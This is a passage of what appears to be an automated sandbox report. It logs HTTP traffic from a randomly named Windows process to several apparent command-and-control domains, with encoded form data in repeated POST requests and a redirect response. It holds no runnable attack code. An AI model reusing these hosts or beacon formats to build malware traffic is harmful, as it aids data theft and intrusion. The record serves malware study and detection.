                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 5a 4f 43 39 30 6d 54 74 46 51 76 61 35 30 42 4d 69 39 49 4e 73 43 64 35 5a 2b 6b 37 68 57 57 34 62 33 68 59 43 56 75 41 51 6a 57 53 53 4f 34 69 30 70 6c 45 42 30 4e 74 7a 63 6b 2b 32 55 67 69 46 6b 58 74 50 79 56 43 76 50 64 4a 53 59 31 78 66 51 6c 72 4e 2b 78 49 78 46 4e 75 6b 35 74 61 54 50 72 6a 54 56 72 51 41 56 59 63 63 66 59 43 35 57 65 47 75 52 2f 46 65 51 65 44 4c 50 59 75 64 6d 57 42 4e 66 46 55 56 61 32 48 4b 79 70 65 32 65 32 4e 6e 31 42 50 76 4d 55 71 35 44 31 5a 4d 4c 50 6f 2f 31 73 38 36 6f 67 42 77 52 38 68 57 34 6d 46 71 37 42 72 7a 66 50 43 48 6e 66 61 55 72 74 51 53 56 74 43 36 79 59 49 6a 6c 37 4c 4e 6c 53 39 4a 45 4c 4e 48 65 79 71
                                                                        Data Ascii: QhKxhNP=ZOC90mTtFQva50BMi9INsCd5Z+k7hWW4b3hYCVuAQjWSSO4i0plEB0Ntzck+2UgiFkXtPyVCvPdJSY1xfQlrN+xIxFNuk5taTPrjTVrQAVYccfYC5WeGuR/FeQeDLPYudmWBNfFUVa2HKype2e2Nn1BPvMUq5D1ZMLPo/1s86ogBwR8hW4mFq7BrzfPCHnfaUrtQSVtC6yYIjl7LNlS9JELNHeyq


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.54993013.248.169.48802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:58.689878941 CET1827OUTPOST /rxts/ HTTP/1.1
                                                                        Host: www.lovel.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.lovel.shop
                                                                        Referer: http://www.lovel.shop/rxts/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 5a 4f 43 39 30 6d 54 74 46 51 76 61 35 30 42 4d 69 39 49 4e 73 43 64 35 5a 2b 6b 37 68 57 57 34 62 33 68 59 43 56 75 41 51 6a 65 53 52 2f 59 69 31 4b 4e 45 50 55 4e 74 35 38 6b 46 32 55 67 7a 46 6c 2f 68 50 79 4a 53 76 4d 31 4a 54 39 35 78 4f 53 4e 72 48 2b 78 49 39 6c 4e 7a 71 5a 73 59 54 50 37 5a 54 56 37 51 41 56 59 63 63 63 41 43 77 6a 69 47 70 68 2f 43 4f 41 66 58 50 50 59 47 64 6d 65 72 4e 66 52 2b 53 75 43 48 4b 53 35 65 30 73 65 4e 6f 31 42 4a 69 73 56 31 35 44 4a 38 4d 4c 6a 6b 2f 32 77 53 36 72 41 42 67 67 68 39 48 70 75 2f 2f 37 42 33 31 74 2f 62 64 44 44 66 65 49 4d 6d 50 6d 45 6a 33 41 56 6b 6f 43 37 50 5a 32 72 46 61 41 33 70 42 4c 44 46 5a 30 55 56 4b 6f 39 4f 45 55 37 4d 4e 56 78 63 78 43 73 53 50 6a 42 4c 48 6d 38 7a 5a 35 4c 4b 58 48 4a 79 4b 56 75 63 31 41 30 6e 44 32 47 66 47 51 4d 6c 63 63 48 39 6d 36 54 74 70 72 65 6d 4d 49 73 42 62 4a 43 49 4f 74 58 31 33 39 6f 33 6f 43 52 65 51 72 31 57 47 4a 6a 2f 65 52 76 41 46 77 4b 70 51 5a 37 41 2b 77 43 41 4c 33 [TRUNCATED]
                                                                        Data Ascii: QhKxhNP=ZOC90mTtFQva50BMi9INsCd5Z+k7hWW4b3hYCVuAQjeSR/Yi1KNEPUNt58kF2UgzFl/hPyJSvM1JT95xOSNrH+xI9lNzqZsYTP7ZTV7QAVYcccACwjiGph/COAfXPPYGdmerNfR+SuCHKS5e0seNo1BJisV15DJ8MLjk/2wS6rABggh9Hpu//7B31t/bdDDfeIMmPmEj3AVkoC7PZ2rFaA3pBLDFZ0UVKo9OEU7MNVxcxCsSPjBLHm8zZ5LKXHJyKVuc1A0nD2GfGQMlccH9m6TtpremMIsBbJCIOtX139o3oCReQr1WGJj/eRvAFwKpQZ7A+wCAL39aVgbTPmX24yIGdNXVfG7t7VyaytoAtyJ0OlTe+6H4WwS/l+fI+63oQqa54R4o/eaUFpHhjISYxqNToSab4feX6asaCJKYezkQLRifj+Pj7IBL9Kg/f8oWu8o0doCa0OU41w8HXeb6gFHc/ZMgJtCi7Kbr2Dj7CeYPkBDDDoGKnALH9MkWpiaEBuguBjsMY6RfRn+F4eqKvPyAQfvVUqGWffcRbV+IL8UeNFdoWKdhybV5WIhgOkrjXghI31T4YLhpzfPHdZfbTgcn045kcRFE8LSQ6VojXuGtvEkJUBU4tP/k4144LPeN4ToqiyQKK7dLyr55JOfJO36yGvHxZTvIq1mIe7H8zSTwRo3kh8VcznDTabBTBS5us1vSr7qbI+uLRxIOHM1FNaEICccQVnhZ2qsN8loC9Ze8/CG4CrfaBX7jmNm+6xfNWAj9uRXSfINIedE1coDPekBI4WY6x/C+pJUbNIGqP3fRBrck7OqYePSWL0YXl7ziXWMZ2wrTScSBdROuAp5/GnotTvef0FholcQAh6xUYJ8vhBB+SEXhfLhEb6aID7I2+WjRycn8i3wS041LB1XinfKmzM6OZTdme5oxEXR+54EhSg2zJlvXFGS6mYMfX2E1HM/lNwsWon198i++BSZZeRFknKUraoZnxcLHU7ct87xB [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.54993713.248.169.48802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:01.353698969 CET540OUTGET /rxts/?Yby=d2ydCtHpb8&QhKxhNP=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmL/pMmEFBmvtdQsTPBX/BeC8bc9YX4gHB5yTSGVyOHdtWew== HTTP/1.1
                                                                        Host: www.lovel.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:15:02.459662914 CET410INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 28 Nov 2024 08:15:02 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 270
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 62 79 3d 64 32 79 64 43 74 48 70 62 38 26 51 68 4b 78 68 4e 50 3d 55 4d 71 64 33 52 72 2f 47 67 6a 63 70 44 74 4d 69 66 46 30 68 41 56 58 55 4c 77 75 67 47 79 61 4a 48 64 66 46 30 76 58 59 78 75 6f 59 38 4e 6d 77 63 52 4b 48 46 52 51 33 5a 63 35 32 32 67 6d 46 57 4c 6d 56 68 70 4f 72 35 46 6c 62 66 6b 72 4f 44 6c 6d 4c 2f 70 4d 6d 45 46 42 6d 76 74 64 51 73 54 50 42 58 2f 42 65 43 38 62 63 39 59 58 34 67 48 42 35 79 54 53 47 56 79 4f 48 64 74 57 65 77 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Yby=d2ydCtHpb8&QhKxhNP=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmL/pMmEFBmvtdQsTPBX/BeC8bc9YX4gHB5yTSGVyOHdtWew=="}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.5499523.33.130.190802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:07.934731960 CET802OUTPOST /zs4o/ HTTP/1.1
                                                                        Host: www.duskgazes.work
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.duskgazes.work
                                                                        Referer: http://www.duskgazes.work/zs4o/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 31 32 61 50 55 74 61 38 66 6a 50 64 44 46 45 6d 58 6c 72 54 2f 68 51 33 43 75 35 52 49 78 71 57 4a 45 33 44 4a 55 49 2b 4e 78 70 30 6c 64 36 4d 58 66 6d 51 38 77 38 71 31 33 56 39 52 72 5a 4a 48 31 70 76 39 50 63 4b 63 4a 75 6a 70 50 64 75 77 63 35 4a 33 54 64 57 49 38 4e 32 31 76 6e 45 62 54 71 67 37 70 55 6c 43 33 68 4e 72 4b 58 4f 30 5a 41 63 32 6f 6c 47 68 6d 6e 6a 4b 53 65 78 74 77 6b 4a 51 52 33 77 53 6b 4a 58 65 70 33 59 51 71 37 55 6a 71 62 30 70 67 55 6e 72 6b 57 43 42 53 4a 59 45 74 59 6d 53 78 34 34 4f 6c 35 68 73 39 63 4d 33 76 36 4e 4a 31 58 43 6e 65 6f 34 4b 31 6e 44 4b 33 73 3d
                                                                        Data Ascii: QhKxhNP=12aPUta8fjPdDFEmXlrT/hQ3Cu5RIxqWJE3DJUI+Nxp0ld6MXfmQ8w8q13V9RrZJH1pv9PcKcJujpPduwc5J3TdWI8N21vnEbTqg7pUlC3hNrKXO0ZAc2olGhmnjKSextwkJQR3wSkJXep3YQq7Ujqb0pgUnrkWCBSJYEtYmSx44Ol5hs9cM3v6NJ1XCneo4K1nDK3s=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.5499593.33.130.190802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:10.616044044 CET822OUTPOST /zs4o/ HTTP/1.1
                                                                        Host: www.duskgazes.work
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.duskgazes.work
                                                                        Referer: http://www.duskgazes.work/zs4o/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 31 32 61 50 55 74 61 38 66 6a 50 64 46 55 55 6d 61 69 2f 54 36 42 51 34 63 65 35 52 43 52 71 53 4a 45 72 44 4a 56 39 35 4d 44 64 30 6b 2f 79 4d 57 65 6d 51 2f 77 38 71 2b 58 56 38 63 4c 5a 43 48 31 74 4a 39 4e 34 4b 63 4a 36 6a 70 4f 74 75 78 76 52 4b 30 6a 64 51 42 63 4e 77 6f 2f 6e 45 62 54 71 67 37 70 42 74 43 78 4a 4e 72 36 6e 4f 6d 74 63 62 6f 34 6c 46 32 57 6e 6a 63 69 65 31 74 77 6b 52 51 54 44 61 53 6e 78 58 65 70 6e 59 52 37 37 54 32 61 62 75 32 77 56 6f 37 58 4c 72 59 41 4e 74 43 76 52 68 46 7a 73 38 50 54 49 4c 32 66 55 6b 6b 50 57 31 5a 6d 66 31 32 75 4a 52 51 57 33 7a 55 67 35 4f 6a 41 41 2b 63 69 69 63 31 64 7a 39 51 62 35 45 45 6b 66 52
                                                                        Data Ascii: QhKxhNP=12aPUta8fjPdFUUmai/T6BQ4ce5RCRqSJErDJV95MDd0k/yMWemQ/w8q+XV8cLZCH1tJ9N4KcJ6jpOtuxvRK0jdQBcNwo/nEbTqg7pBtCxJNr6nOmtcbo4lF2Wnjcie1twkRQTDaSnxXepnYR77T2abu2wVo7XLrYANtCvRhFzs8PTIL2fUkkPW1Zmf12uJRQW3zUg5OjAA+ciic1dz9Qb5EEkfR


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.5499653.33.130.190802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:13.284480095 CET1839OUTPOST /zs4o/ HTTP/1.1
                                                                        Host: www.duskgazes.work
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.duskgazes.work
                                                                        Referer: http://www.duskgazes.work/zs4o/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 31 32 61 50 55 74 61 38 66 6a 50 64 46 55 55 6d 61 69 2f 54 36 42 51 34 63 65 35 52 43 52 71 53 4a 45 72 44 4a 56 39 35 4d 44 6c 30 6c 4d 71 4d 58 39 2b 51 2b 77 38 71 69 6e 56 35 63 4c 5a 6c 48 31 56 46 39 4e 45 67 63 4b 43 6a 6f 73 6c 75 67 75 52 4b 6a 54 64 51 44 63 4e 78 31 76 6d 47 62 54 36 6b 37 70 52 74 43 78 4a 4e 72 34 50 4f 6c 35 41 62 71 34 6c 47 68 6d 6e 76 4b 53 66 51 74 77 73 42 51 54 48 67 53 58 52 58 65 49 58 59 53 4a 54 54 30 36 62 77 31 77 55 33 37 58 48 77 59 42 68 58 43 75 56 48 46 78 38 38 4f 69 74 50 69 2b 73 75 35 2b 75 6c 63 78 4c 6a 6b 4a 35 55 57 58 57 63 52 41 78 58 72 7a 45 52 4b 56 71 72 78 73 48 77 54 36 70 65 43 53 57 77 49 31 31 56 4f 4b 76 69 30 34 36 44 38 39 59 34 76 56 45 56 52 64 35 4d 55 62 36 42 30 66 58 79 37 6c 5a 6b 66 68 62 6e 56 42 2f 61 68 6a 6d 55 78 67 2f 54 63 5a 4c 55 43 6e 6b 75 30 5a 37 44 5a 52 58 4c 2b 6b 74 67 36 32 41 2f 68 4b 57 78 33 52 73 30 41 32 54 5a 4d 75 70 6c 36 6c 49 71 7a 45 44 7a 5a 51 4b 48 7a 71 58 32 72 4d [TRUNCATED]
                                                                        Data Ascii: QhKxhNP=12aPUta8fjPdFUUmai/T6BQ4ce5RCRqSJErDJV95MDl0lMqMX9+Q+w8qinV5cLZlH1VF9NEgcKCjosluguRKjTdQDcNx1vmGbT6k7pRtCxJNr4POl5Abq4lGhmnvKSfQtwsBQTHgSXRXeIXYSJTT06bw1wU37XHwYBhXCuVHFx88OitPi+su5+ulcxLjkJ5UWXWcRAxXrzERKVqrxsHwT6peCSWwI11VOKvi046D89Y4vVEVRd5MUb6B0fXy7lZkfhbnVB/ahjmUxg/TcZLUCnku0Z7DZRXL+ktg62A/hKWx3Rs0A2TZMupl6lIqzEDzZQKHzqX2rM0LGLKn12nrHWfAjmII0ij5Acinzww3RbJ9YTIcYxEobSFoKUoDnc/jqt7cJqYX9CL5+k0QGj0Di4Eci8/GmlkYURuoNbbahnQeSf87sptceeUhFoXeAt4Z8JrcaUif6BWYXGM8ECPQvCwC2XZUE8/vncYhdZh1p4a6GrJFEapg582+jV7uoBtHmjbAnARm5J0BGgmWB1ecnleZLlbR3pXVT41Ew0sNgiUEvpWNyDKthNBuCgDd58HpI6zplZE6+JgwIbx/1MFBSYzzgxkcpeQXAnLBpO5eL5yPjmEFDROYEniGu+XwYBoHr7Q/8ztjtpEoi1AoaP72KGB9Tb6oo/viexBAWEfwJ4gb38SLr9hUpkZR8Kkri1vNkmyVcEnj9TUdTXo+eLpkOEjRg5zSWGnzChfS/jkl0DTlKvMxLiAb/zp6tSXYOZ7Bw2NOnYAZaiurBVMYeQhg9GS93Usl/cTVASHVXC3a7OOcEjv5g89N8mWbrFeGQPAZvJ+Fs77eqDGuHRXI+6S1I+gryXRZsxGMJY1Y/lHn3Qdgae/WoTJLcwMe3w8sJCGAyhKcIFcyTUCALq7g6D1OolnOf4IG5jlC2qh+a5zBqMWEytVMki5QOfsEAeRSHVBkSPlyYUFRcuvwoWcuf7kYwTS/Sr/hKs61HrT4uwX1E67B [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.5499733.33.130.190802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:15.980632067 CET544OUTGET /zs4o/?QhKxhNP=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWuFQr4uBZgu5x5JrNmZwlLDog/JQkd5M42bUbwrevw==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.duskgazes.work
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:15:17.045238018 CET410INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 28 Nov 2024 08:15:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 270
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 68 4b 78 68 4e 50 3d 34 30 79 76 58 5a 71 51 58 77 79 4f 46 54 6c 30 64 31 66 78 77 68 51 47 54 73 5a 6a 4b 43 43 33 4a 57 6a 48 4a 45 5a 38 49 42 5a 75 74 4f 2b 59 53 71 76 76 77 69 6f 68 31 52 42 56 52 4b 6c 4d 49 52 56 78 75 63 55 71 45 4d 57 67 72 2b 46 41 67 66 5a 59 6f 52 34 76 57 75 46 51 72 34 75 42 5a 67 75 35 78 35 4a 72 4e 6d 5a 77 6c 4c 44 6f 67 2f 4a 51 6b 64 35 4d 34 32 62 55 62 77 72 65 76 77 3d 3d 26 59 62 79 3d 64 32 79 64 43 74 48 70 62 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QhKxhNP=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWuFQr4uBZgu5x5JrNmZwlLDog/JQkd5M42bUbwrevw==&Yby=d2ydCtHpb8"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.549984172.67.222.69802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:22.555114031 CET823OUTPOST /xyvr/ HTTP/1.1
                                                                        Host: www.zrinorem-srumimit.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.zrinorem-srumimit.sbs
                                                                        Referer: http://www.zrinorem-srumimit.sbs/xyvr/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 4f 6d 58 51 54 38 39 72 76 37 6f 64 76 32 59 49 31 67 38 65 57 56 43 77 38 43 6d 48 30 35 77 49 73 55 67 4e 42 76 56 5a 6d 5a 37 69 70 32 4b 2f 55 76 68 51 39 30 54 62 2b 68 31 68 70 30 34 32 78 4c 70 5a 30 75 43 4c 4d 77 66 75 79 44 39 2b 39 74 6a 50 6b 53 33 72 34 70 5a 59 69 59 55 72 6a 53 4e 6e 44 6d 6f 6f 30 77 6d 6b 65 2b 47 62 62 59 56 61 30 61 45 75 45 74 70 4a 53 50 33 44 73 51 52 64 79 44 44 6b 41 5a 70 79 4d 74 55 66 63 63 56 44 49 36 37 57 67 41 45 2f 65 34 71 72 51 74 74 51 46 54 55 6e 6f 62 36 76 7a 45 6b 73 4a 79 6d 38 4e 4e 65 2f 4a 68 66 2b 4b 6a 6c 70 48 39 5a 79 36 56 34 3d
                                                                        Data Ascii: QhKxhNP=OmXQT89rv7odv2YI1g8eWVCw8CmH05wIsUgNBvVZmZ7ip2K/UvhQ90Tb+h1hp042xLpZ0uCLMwfuyD9+9tjPkS3r4pZYiYUrjSNnDmoo0wmke+GbbYVa0aEuEtpJSP3DsQRdyDDkAZpyMtUfccVDI67WgAE/e4qrQttQFTUnob6vzEksJym8NNe/Jhf+KjlpH9Zy6V4=
                                                                        Nov 28, 2024 09:15:23.873202085 CET1236INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:15:23 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Last-Modified: Sat, 14 Sep 2024 06:51:15 GMT
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aiTvGJUOdRFKR9plj95L8vps6suq%2Fp71DOmgp%2FA0eaTabHxfo7A5e24OCP2PEuyhmzBa6qq3ir0jS9XCixpPdQTJDDNFlY2wfVrDXC4yvRrXjKtKF%2BEHreozL2%2B5HoTnthZw5a5I0%2BNGCRIk"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e8ebefebc439-EWR
                                                                        Content-Encoding: gzip
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1456&rtt_var=728&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 04 81 40 22 75 d3 0e b6 26 69 a4 d1 6e 62 12 3f 26 56 04 3c ba c9 35 36 24 76 b0 af 69 c3 c4 ff 8e 9c 64 6d 27 c6 c4 03 ce 8b 73 f7 dd f7 dd d9 77 8e 1f cd 3f cc 16 5f af ce 41 50 59 c0 d5 a7 d7 6f 2f 67 e0 f9 8c 7d 1e cf 18 9b 2f e6 f0 e5 cd e2 dd 5b 08 06 43 b8 26 23 53 62 ec fc bd 07 9e 20 aa 42 c6 36 9b cd 60 33 1e 68 93 b3 c5 47 b6 75 2c 81 0b eb b7 be 6d 63 06 19 65 5e 72 14 b7 22 db b2 50 76 7a 0f 41 30 99 4c ba 38 cf 81 c2 82 ab 7c ea a1 f2 60 b7 4b 62 81 3c 4b 8e 00 00 62 92 54 60 72 3c 3c 86 a7 65 c6 ad 88 e0 bd 26 b8 d0 6b 95 c5 ac 73 76 c0 12 89 83 d3 f3 f1 c7 5a d6 53 6f a6 15 a1 22 7f d1 54 e8 41 da fd 4d 3d c2 2d 31 a7 1f 41 2a b8 b1 48 d3 4f 8b 0b ff d4 63 87 44 8a 97 38 f5 32 b4 a9 91 15 49 ad 0e 18 ae b5 31 cd 0b a8 78 8e a0 34 c1 ca 25 b3 0b b7 d4 14 08 d4 54 d8 6b a5 d6 7a 9d cf ad a5 ce 1a b8 59 69 45 be 95 3f 31 0c 8e ab 6d 04 a9 2e b4 09 1f 9f b4 2b 82 d6 bd e2 a5 2c 9a 90 1b c9 8b 08 1c 95 cf 0b 99 [TRUNCATED]
                                                                        Data Ascii: 2daTo0~_q@"u&inb?&V<56$vidm'sw?_APYo/g}/[C&#Sb B6`3hGu,mce^r"PvzA0L8|`Kb<KbT`r<<e&ksvZSo"TAM=-1A*HOcD82I1x4%TkzYiE?1m.+,0EEh_;Na<PN&g'g
                                                                        Nov 28, 2024 09:15:23.873219967 CET381INData Raw: 94 dc e4 52 85 70 32 ac b6 30 74 df 21 c1 08 6e 3a 3c 3c 9e 9f bf 9a bd 9c df cd 01 fa 24 f6 22 30 6a 45 5a c3 06 65 2e 28 84 a5 2e b2 08 0a 24 42 e3 db 8a a7 52 e5 21 f8 81 03 de ca fb e3 56 7e 3c a9 b6 07 fa 15 dc 6c 64 46 22 1c 77 b4 7f 16 db
                                                                        Data Ascii: Rp20t!n:<<$"0jEZe.(.$BR!V~<ldF"w(kQo0vkB:T6>~9~uvPK+1<%Yk4A(f^0MO#6XKYJe^r=f<YaDpk%WnRz_&}_XN@i6h4R@


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.549991172.67.222.69802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:25.222577095 CET843OUTPOST /xyvr/ HTTP/1.1
                                                                        Host: www.zrinorem-srumimit.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.zrinorem-srumimit.sbs
                                                                        Referer: http://www.zrinorem-srumimit.sbs/xyvr/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
